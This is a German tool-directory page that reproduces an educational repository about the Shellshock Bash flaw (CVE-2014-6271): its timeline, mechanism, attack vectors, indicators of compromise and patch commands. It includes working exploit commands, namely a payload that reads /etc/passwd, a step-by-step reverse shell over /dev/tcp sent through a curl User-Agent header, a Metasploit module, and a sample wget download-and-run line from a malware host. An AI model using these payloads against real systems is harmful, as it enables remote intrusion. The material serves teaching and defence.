Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
-CVE-2014-6271 — Bildungs-Repository, das die Shellshock-Sicherheitslücke (CVE-2014-6271) detailliert beschreibt, einschließlich technischer Analyse, Angriffsvektoren, Proof-of-Concept-Ausnutzung und Maßnahmen zur Absicherung gegen die Injection von Umgebungsvariablen in Bash. | Kitploit
Tools/GitHubGitHub/kaleth4/-cve-2014-6271
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubkaleth4/-cve-2014-6271

-CVE-2014-6271

Bildungs-Repository, das die Shellshock-Sicherheitslücke (CVE-2014-6271) detailliert beschreibt, einschließlich technischer Analyse, Angriffsvektoren, Proof-of-Concept-Ausnutzung und Maßnahmen zur Absicherung gegen die Injection von Umgebungsvariablen in Bash.

Repository anzeigen
7vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
 ____  _   _ _____ _     _     ____  _   _  ___   ____ _  __
/ ___|| | | | ____| |   | |   / ___|| | | |/ _ \ / ___| |/ /
\___ \| |_| |  _| | |   | |   \___ \| |_| | | | | |   | ' / 
 ___) |  _  | |___| |___| |___ ___) |  _  | |_| | |___| . \ 
|____/|_| |_|_____|_____|_____|____/|_| |_|\___/ \____|_|\_\

CVE-2014-6271 — Shellshock

Remote Code Execution via Bash-Umgebungsvariablen-Injection

CVE CVSS Type Bash Status

„Ein Fehler, der über Jahrzehnte in Bash verborgen war und die Grundfesten des Internets in weniger als 24 Stunden erschütterte.“


Inhaltsverzeichnis

  • ❓ Was ist Shellshock?
  • 📅 Zeitstrahl
  • 💻 Betroffene Systeme
  • 🔬 Technische Beschreibung
  • 🧪 PoC — Proof-of-Concept
  • ⚔️ Angriffsvektoren
  • 💀 Vollständige Exploitation: Reverse Shell
  • 🔍 Indikatoren für eine Kompromittierung (IoC)
  • 🛡️ Gegenmaßnahmen
  • ⚠️ Haftungsausschluss

❓ Was ist Shellshock?

Shellshock (auch bekannt als Bashdoor) ist eine Familie kritischer Schwachstellen im GNU-Bash-Interpreter, die es einem entfernten Angreifer ermöglicht, beliebige Befehle auf dem Zielsystem auszuführen.

Der grundlegende Fehler: Bash brach die Analyse einer Umgebungsvariable nicht ab, nachdem die Funktionsdefinition beendet war. Jeder Code, der nach () { :; }; angehängt wurde, wurde automatisch ausgeführt.

Umgebungsvariable → Funktionsdefinition → [HIER WIRD ZUSÄTZLICHER CODE AUSGEFÜHRT] ← BUG

Da Webserver (CGI/Apache), SSH-Dienste und DHCP-Clients Header oder Parameter in Bash-Umgebungsvariablen umwandeln, war die Angriffsfläche massiv.


📅 Zeitstrahl

12. Sep. 2014 ── Stéphane Chazelas entdeckt den Fehler und meldet ihn Chet Ramey (Bash-Maintainer)
                 Der Bug existierte bereits seit über 20 Jahren in Bash.

24. Sep. 2014 ── Öffentliche Offenlegung + Veröffentlichung des Patches (CVE-2014-6271)
                 Stunden später: aktive Botnets scannen massiv das Internet.

25.–30. Sep. 2014 ── Verwandte Schwachstellen entdeckt:
                     CVE-2014-6277, CVE-2014-6278, CVE-2014-7169,
                     CVE-2014-7186, CVE-2014-7187

Okt. 2014 ──────── Millionen registrierter Angriffe. Im Schweregrad mit Heartbleed verglichen.

💻 Betroffene Systeme

ProduktAnfällige VersionenStatus
GNU Bash1.0.3 – 4.3Gepatched
Linux (Debian/Ubuntu/CentOS/RHEL)Versionen vor Sept. 2014Gepatched
Apple macOS / OS X10.10 und älterGepatched (Security Update 2014-005)
IoT-Geräte mit eingebettetem BashMehrereJe nach Hersteller unterschiedlich
Webserver mit CGI über ApacheJede Version mit anfälligem BashGepatched

🔬 Technische Beschreibung

Der Mechanismus des Bugs

Wenn Bash eine Funktion aus einer Umgebungsvariable importiert, liest es bis zur schließenden } der Funktion. In anfälligen Versionen verarbeitete es den nachfolgenden Code weiter, anstatt anzuhalten.

# Bösartige Umgebungsvariable:
SHELLSHOCK='() { :; }; /bin/cat /etc/passwd'

# Anfälliger Bash beim Initialisieren:
# 1. Liest die Funktionsdefinition  → OK
# 2. Findet }; → sollte anhalten
# 3. Fährt FORT → führt /bin/cat /etc/passwd aus  ← BUG

Angriffsablauf via CGI

Angreifer                    Apache-Server (CGI)              Bash (anfällig)
   │                               │                                │
   │  HTTP Request                 │                                │
   │  User-Agent: () { :;}; cmd    │                                │
   │──────────────────────────────▶│                                │
   │                               │  Wandelt Header in Env-Vars um │
   │                               │  HTTP_USER_AGENT=() { :;}; cmd │
   │                               │───────────────────────────────▶│
   │                               │                                │ Führt cmd aus
   │                               │                                │ als www-data
   │◀──────────────────────────────│◀───────────────────────────────│
   │  Antwort + Ausgabe des cmd    │                                │

🧪 PoC — Proof-of-Concept

Einfache Verwundbarkeitsprüfung

env x='() { :;}; echo ANFÄLLIG' bash -c "echo this is a test"

Ergebnis auf ANFÄLLIGEM System:

ANFÄLLIG
this is a test

Ergebnis auf GEPATCHTEM System:

this is a test

(oder ein Syntaxfehler — gibt niemals „ANFÄLLIG“ aus)


⚔️ Angriffsvektoren

1. CGI-BIN (am häufigsten)

Webserver, die .cgi-Skripte verwenden, wandeln die HTTP-Header in Bash-Umgebungsvariablen um.

Betroffene Header: User-Agent, Referer, Cookie, X-Forwarded-For, sowie beliebige benutzerdefinierte Header

2. SSH mit ForceCommand

# Wenn der Server ForceCommand gesetzt hat, kann ein Angreifer mit gültigem Schlüssel dies umgehen
ssh benutzer@ziel '() { :;}; /bin/bash'

3. DHCP-Client

Bösartige DHCP-Server können Umgebungsvariablen in Clients injizieren, die Bash zur Verarbeitung der DHCP-Antwort verwenden.

4. Direkte Umgebungsvariablen

# Jeder Prozess, der Umgebungsvariablen erbt und Bash ausführt
env VAR='() { :;}; bösartiger_befehl' bash -c "legitimes_skript"

💀 Vollständige Exploitation: Reverse Shell

Schritt 1: Listener auf Angreifermaschine

nc -lvnp 4444

Schritt 2: Reverse-Shell-Payload

# Payload, der in den User-Agent eingefügt wird
() { :;}; /bin/bash -i >& /dev/tcp/ANGREIFER_IP/4444 0>&1

Schritt 3: Bösartige Anfrage senden

curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" \
     http://anfällige-seite.com/cgi-bin/test.cgi

Schritt 4: Shell erhalten

Connection received from 10.10.10.50
bash: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Metasploit-Modul

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target>
set TARGETURI /cgi-bin/test.cgi
set LHOST <your_ip>
run

🔍 Indikatoren für eine Kompromittierung (IoC)

In Apache/Nginx-Logs

# Nach dem charakteristischen Muster in der access.log suchen
grep -E "\(\)\s*\{" /var/log/apache2/access.log

# Beispiel für einen bösartigen Logeintrag:
# "() { :;}; wget http://malware.com/bot -O /tmp/x && chmod +x /tmp/x && /tmp/x"

Verdächtige Prozesse

# Kindprozesse von www-data/apache, die nicht existieren sollten
ps aux | grep www-data | grep -v grep
netstat -antup | grep ESTABLISHED

Systemindikatoren

- Neue ausführbare Dateien in /tmp, /var/tmp, /dev/shm
- Ausgehende Verbindungen vom Webserver zu unbekannten IPs
- Veränderung von /etc/crontab oder /etc/passwd
- Bash-Prozesse, die als www-data ohne Terminal laufen

🛡️ Gegenmaßnahmen

Sofort-Patch (KRITISCHE PRIORITÄT)

# Debian / Ubuntu
sudo apt-get update && sudo apt-get install --only-upgrade bash

# RHEL / CentOS / Fedora
sudo yum update bash
Tool herunterladen